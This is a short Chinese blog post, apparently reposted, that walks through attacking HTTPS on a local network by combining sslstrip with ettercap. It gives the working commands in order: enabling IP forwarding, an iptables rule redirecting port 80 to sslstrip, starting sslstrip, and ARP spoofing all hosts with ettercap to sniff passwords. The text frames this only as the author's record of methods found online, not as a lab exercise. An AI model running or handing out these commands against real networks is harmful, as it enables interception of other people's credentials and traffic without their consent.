Ettercap结合sslstrip对ssl/https进行攻击

本文介绍如何结合使用Ettercap与SSLStrip工具,在局域网中进行HTTPS流量的嗅探与欺骗攻击。首先通过开启IP转发及设置iptables规则实现HTTP流量重定向到SSLStrip监听端口,接着利用SSLStrip解除HTTPS加密,最后使用Ettercap实施ARP欺骗。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

   

        Ettercap是一个非常强大的嗅探欺骗工具;在以往的ettercap的使用过程中,我们大多用来嗅探http,ftp,和一些加密比较简单的邮箱等的密码,对于新型的ssl/https等的加密协议就显得不是太完美;这里我们使用一款专门针对ssl/https加密协议的工具配合Ettercap进行局域网嗅探欺骗:sslstrip。

       以下方法均来自互联网,这里只是记录一下笔者自己使用过程!

 

1.开启转发:

echo "1">/proc/sys/net/ipv4/ip_forward

2.iptables过滤数据包

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

还有一种方式:修改/etc/ettercap/etter.conf

去掉# if you use iptables:

   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

的两个注释即可

3.监听转发端口

sslstrip -l 10000 

4.arp嗅探

ettercap -T -q -i wlan0 -M arp:remote // //

 

   

   

   

视频:

清晰版下载地址:http://pan.baidu.com/s/1qWJbFrA

转载于:https://www.cnblogs.com/h4ck0ne/p/5154688.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值